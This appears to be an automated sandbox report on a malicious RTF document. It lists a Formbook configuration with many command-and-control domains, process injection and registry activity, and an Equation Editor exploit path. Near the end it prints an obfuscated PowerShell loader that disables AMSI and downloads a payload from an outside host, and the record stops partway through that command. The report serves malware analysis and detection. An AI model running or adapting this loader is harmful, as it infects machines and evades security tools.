Analysis
-
max time kernel
152s -
max time network
150s -
platform
windows7_x64 -
resource
win7-en-20211208 -
submitted
31-01-2022 06:48
Static task
static1
Behavioral task
behavioral1
Sample
RFQ_OFFER_3098_5RFQ-5914.rtf
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
RFQ_OFFER_3098_5RFQ-5914.rtf
Resource
win10-en-20211208
General
-
Target
RFQ_OFFER_3098_5RFQ-5914.rtf
-
Size
2.2MB
-
MD5
150261328c9acaecc66968ae0efd37ee
-
SHA1
19eeff6bfc783323a85950682958f5e006c5b0e8
-
SHA256
c796080f9c704855e94c27f3126628cc1434b252ae6a8168de81865d7e4eb20a
-
SHA512
c3bb944949065d71fbdeb054c2d6ac59a52a4e023207087a2c2ae5d8b5b6ed292d01d2405120913e683e7a903fc259719d35c33001aa72e30df74b2d6a5197f0
Malware Config
Extracted
formbook
4.1
cc16
dcownloadaudiobooks.com
agencyfreedom.net
code9help.com
nextstarwkrg.com
ashleyjana.net
livingarrangementmove.com
nuevorenaultaustral.com
cyptosphere.com
thelearningforestacademy.com
frestail.info
veohat.online
infoemailteamitnetalpha.com
rainforestsloth.com
auzunstore.com
comepritty.com
comchain.digital
spacemind.space
riacompliancebox.com
rocketaccoynt.com
feng01.xyz
gadgetbursts.com
lccontrolsystems.com
bestphotonow.com
safetyrunway.com
similarbringdoctor.top
vrdining.net
peoplehealty4.xyz
bedside.care
impfen-mit-herz.com
pacificwestaccess.com
douvip462.com
radiogenesisiguazu.com
musicnoreverywhere.xyz
newjerseyplumbingservices.com
homes4saleincampbellriver.com
lojas12.com
agras.expert
lubomirgroch.com
xu8arboo59y3.xyz
vuecreativeagency.com
alexandre-langlois.net
shelbytokenshop.com
apotek.site
zeynepserce.com
smallpocketsbigbrand.com
xhtd6085.com
dylansinteriorpaintingllc.com
lasertherapyhawaii.com
redoris.com
capereno.com
jiangxibzy.com
045119.com
rachaelphillipsdataexpert.com
themajestichouse.com
hagyreo.xyz
diesel-heart.com
samsaratee.com
chsnetworking.com
aiotoy.com
tf2bux.com
lapsoiot.xyz
257mg.xyz
securebre.cat
murdercloud.com
movies2watchcc.com
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
Powershell.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1656 736 Powershell.exe -
Formbook Payload 2 IoCs
Processes:
resource yara_rule behavioral1/memory/1828-75-0x0000000000400000-0x000000000042F000-memory.dmp formbook behavioral1/memory/1752-84-0x00000000000C0000-0x00000000000EF000-memory.dmp formbook -
Blocklisted process makes network request 2 IoCs
Processes:
Powershell.exeflow pid process 6 1656 Powershell.exe 8 1656 Powershell.exe -
Drops file in System32 directory 1 IoCs
Processes:
Powershell.exedescription ioc process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk Powershell.exe -
Suspicious use of SetThreadContext 4 IoCs
Processes:
Powershell.execalc.exesvchost.exedescription pid process target process PID 1656 set thread context of 1828 1656 Powershell.exe calc.exe PID 1828 set thread context of 1384 1828 calc.exe Explorer.EXE PID 1828 set thread context of 1384 1828 calc.exe Explorer.EXE PID 1752 set thread context of 1384 1752 svchost.exe Explorer.EXE -
Drops file in Windows directory 1 IoCs
Processes:
WINWORD.EXEdescription ioc process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
Office loads VBA resources, possible macro or embedded object present
-
Launches Equation Editor 1 TTPs 1 IoCs
Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.
-
Processes:
WINWORD.EXEdescription ioc process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\MenuExt WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit" WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\Toolbar WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" WINWORD.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" WINWORD.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command WINWORD.EXE -
Modifies registry class 64 IoCs
Processes:
WINWORD.EXEdescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" /p %1" WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application\ = "Excel" WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000 WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\ShellEx WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" /p %1" WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\ = "&Open" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\ = "&Print" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version\14 WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\ = "[open(\"%1\")]" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\ = "&Print" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\ = "&Open" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\ = "&Open" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application\ = "Excel" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\ = "&Open" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ = "&Open" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" %1" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597} WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32 WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000 WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\ = "&Open" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\ = "&Edit" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
WINWORD.EXEpid process 1720 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 24 IoCs
Processes:
Powershell.execalc.exesvchost.exepid process 1656 Powershell.exe 1656 Powershell.exe 1656 Powershell.exe 1828 calc.exe 1828 calc.exe 1828 calc.exe 1752 svchost.exe 1752 svchost.exe 1752 svchost.exe 1752 svchost.exe 1752 svchost.exe 1752 svchost.exe 1752 svchost.exe 1752 svchost.exe 1752 svchost.exe 1752 svchost.exe 1752 svchost.exe 1752 svchost.exe 1752 svchost.exe 1752 svchost.exe 1752 svchost.exe 1752 svchost.exe 1752 svchost.exe 1752 svchost.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
Explorer.EXEpid process 1384 Explorer.EXE -
Suspicious behavior: MapViewOfSection 6 IoCs
Processes:
calc.exesvchost.exepid process 1828 calc.exe 1828 calc.exe 1828 calc.exe 1828 calc.exe 1752 svchost.exe 1752 svchost.exe -
Suspicious use of AdjustPrivilegeToken 28 IoCs
Processes:
Powershell.execalc.exesvchost.exeExplorer.EXEdescription pid process Token: SeDebugPrivilege 1656 Powershell.exe Token: SeIncreaseQuotaPrivilege 1656 Powershell.exe Token: SeSecurityPrivilege 1656 Powershell.exe Token: SeTakeOwnershipPrivilege 1656 Powershell.exe Token: SeLoadDriverPrivilege 1656 Powershell.exe Token: SeSystemProfilePrivilege 1656 Powershell.exe Token: SeSystemtimePrivilege 1656 Powershell.exe Token: SeProfSingleProcessPrivilege 1656 Powershell.exe Token: SeIncBasePriorityPrivilege 1656 Powershell.exe Token: SeCreatePagefilePrivilege 1656 Powershell.exe Token: SeBackupPrivilege 1656 Powershell.exe Token: SeRestorePrivilege 1656 Powershell.exe Token: SeShutdownPrivilege 1656 Powershell.exe Token: SeDebugPrivilege 1656 Powershell.exe Token: SeSystemEnvironmentPrivilege 1656 Powershell.exe Token: SeRemoteShutdownPrivilege 1656 Powershell.exe Token: SeUndockPrivilege 1656 Powershell.exe Token: SeManageVolumePrivilege 1656 Powershell.exe Token: 33 1656 Powershell.exe Token: 34 1656 Powershell.exe Token: 35 1656 Powershell.exe Token: SeDebugPrivilege 1828 calc.exe Token: SeDebugPrivilege 1752 svchost.exe Token: SeShutdownPrivilege 1384 Explorer.EXE Token: SeShutdownPrivilege 1384 Explorer.EXE Token: SeShutdownPrivilege 1384 Explorer.EXE Token: SeShutdownPrivilege 1384 Explorer.EXE Token: SeShutdownPrivilege 1384 Explorer.EXE -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
WINWORD.EXEpid process 1720 WINWORD.EXE 1720 WINWORD.EXE -
Suspicious use of WriteProcessMemory 27 IoCs
Processes:
EQNEDT32.EXECmD.exeWINWORD.EXEPowershell.exeExplorer.EXEsvchost.exedescription pid process target process PID 332 wrote to memory of 1408 332 EQNEDT32.EXE CmD.exe PID 332 wrote to memory of 1408 332 EQNEDT32.EXE CmD.exe PID 332 wrote to memory of 1408 332 EQNEDT32.EXE CmD.exe PID 332 wrote to memory of 1408 332 EQNEDT32.EXE CmD.exe PID 1408 wrote to memory of 812 1408 CmD.exe cscript.exe PID 1408 wrote to memory of 812 1408 CmD.exe cscript.exe PID 1408 wrote to memory of 812 1408 CmD.exe cscript.exe PID 1408 wrote to memory of 812 1408 CmD.exe cscript.exe PID 1720 wrote to memory of 1600 1720 WINWORD.EXE splwow64.exe PID 1720 wrote to memory of 1600 1720 WINWORD.EXE splwow64.exe PID 1720 wrote to memory of 1600 1720 WINWORD.EXE splwow64.exe PID 1720 wrote to memory of 1600 1720 WINWORD.EXE splwow64.exe PID 1656 wrote to memory of 1828 1656 Powershell.exe calc.exe PID 1656 wrote to memory of 1828 1656 Powershell.exe calc.exe PID 1656 wrote to memory of 1828 1656 Powershell.exe calc.exe PID 1656 wrote to memory of 1828 1656 Powershell.exe calc.exe PID 1656 wrote to memory of 1828 1656 Powershell.exe calc.exe PID 1656 wrote to memory of 1828 1656 Powershell.exe calc.exe PID 1656 wrote to memory of 1828 1656 Powershell.exe calc.exe PID 1384 wrote to memory of 1752 1384 Explorer.EXE svchost.exe PID 1384 wrote to memory of 1752 1384 Explorer.EXE svchost.exe PID 1384 wrote to memory of 1752 1384 Explorer.EXE svchost.exe PID 1384 wrote to memory of 1752 1384 Explorer.EXE svchost.exe PID 1752 wrote to memory of 1724 1752 svchost.exe cmd.exe PID 1752 wrote to memory of 1724 1752 svchost.exe cmd.exe PID 1752 wrote to memory of 1724 1752 svchost.exe cmd.exe PID 1752 wrote to memory of 1724 1752 svchost.exe cmd.exe
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\RFQ_OFFER_3098_5RFQ-5914.rtf"2⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122883⤵
-
C:\Windows\SysWOW64\svchost.exe"C:\Windows\SysWOW64\svchost.exe"2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/c del "C:\WINDOWS\syswow64\calc.exe"3⤵
-
C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding1⤵
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\CmD.exeCmD.exe /C cscript %tmp%\Client.vbs AC2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cscript.execscript C:\Users\Admin\AppData\Local\Temp\Client.vbs AC3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exePowershell $a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like '*iUtils') {$c=$b}};$d=$c.GetFields('NonPublic,Static');Foreach($e in $d) {if ($e.Name -like '*Context') {$f=$e}};$g=$f.GetValue($null);[IntPtr]$ptr=$g;[Int32[]]$buf = @(0);[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1);$76768858575776876868687575849493993845774=@(91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,39,83,121,39,43,39,115,116,101,109,46,39,43,39,77,97,110,97,39,43,39,103,101,109,39,43,39,101,110,116,39,43,39,46,65,117,116,111,109,39,43,39,97,116,105,111,39,43,39,110,46,39,43,36,40,91,67,72,65,114,93,40,57,56,45,51,51,41,43,91,99,72,65,114,93,40,49,50,52,45,49,53,41,43,91,99,104,65,82,93,40,49,49,53,41,43,91,67,72,97,82,93,40,91,66,89,116,101,93,48,120,54,57,41,41,43,39,85,116,105,108,115,39,41,46,71,101,116,70,105,101,108,100,40,36,40,91,67,104,65,114,93,40,91,98,121,116,101,93,48,120,54,49,41,43,91,99,104,97,82,93,40,91,98,89,116,69,93,48,120,54,68,41,43,91,99,104,97,114,93,40,91,98,121,84,101,93,48,120,55,51,41,43,91,99,104,65,114,93,40,49,49,48,45,53,41,43,91,99,104,65,82,93,40,91,66,89,84,69,93,48,120,52,57,41,43,91,99,72,97,82,93,40,57,54,56,48,47,56,56,41,43,91,99,72,97,82,93,40,49,48,53,41,43,91,67,104,97,114,93,40,91,98,89,116,101,93,48,120,55,52,41,43,91,67,104,97,114,93,40,91,66,89,84,69,93,48,120,52,54,41,43,91,99,104,97,114,93,40,49,52,56,45,53,49,41,43,91,99,72,65,82,93,40,57,53,53,53,47,57,49,41,43,91,67,104,65,82,93,40,49,48,56,41,43,91,67,104,65,114,93,40,54,50,54,50,47,54,50,41,43,91,67,104,65,82,93,40,91,98,89,84,69,93,48,120,54,52,41,41,44,39,78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,99,39,41,46,83,101,116,86,97,108,117,101,40,36,110,117,108,108,44,36,116,114,117,101,41,59,40,36,68,48,48,70,57,70,49,85,67,54,61,36,68,48,48,70,57,70,49,85,67,54,61,87,114,105,116,101,45,72,111,115,116,32,39,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,39,41,59,100,111,32,123,36,112,105,110,103,32,61,32,116,101,115,116,45,99,111,110,110,101,99,116,105,111,110,32,45,99,111,109,112,32,103,111,111,103,108,101,46,99,111,109,32,45,99,111,117,110,116,32,49,32,45,81,117,105,101,116,125,32,117,110,116,105,108,32,40,36,112,105,110,103,41,59,36,66,48,50,65,53,50,65,48,56,49,32,61,32,91,69,110,117,109,93,58,58,84,111,79,98,106,101,99,116,40,91,83,121,115,116,101,109,46,78,101,116,46,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,84,121,112,101,93,44,32,51,48,55,50,41,59,91,83,121,115,116,101,109,46,78,101,116,46,83,101,114,118,105,99,101,80,111,105,110,116,77,97,110,97,103,101,114,93,58,58,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,32,61,32,36,66,48,50,65,53,50,65,48,56,49,59,36,65,68,48,48,70,57,70,49,85,67,61,32,78,101,119,45,79,98,106,101,99,116,32,45,67,111,109,32,77,105,99,114,111,115,111,102,116,46,88,77,76,72,84,84,80,59,36,65,68,48,48,70,57,70,49,85,67,46,111,112,101,110,40,39,71,69,84,39,44,39,104,116,116,112,115,58,47,47,100,114,111,112,109,98,46,99,111,109,47,102,105,108,101,115,47,48,101,97,52,97,100,52,52,56,102,49,98,97,52,49,99,53,99,101,53,49,49,48,98,100,51,99,51,102,55,56,53,46,106,112,103,39,44,36,102,97,108,115,101,41,59,36,65,68,48,48,70,57,70,49,85,67,46,115,101,110,100,40,41,59,36,54,55,52,69,49,54,53,67,56,51,61,91,84,101,120,116,46,69,110,99,111,100,105,110,103,93,58,58,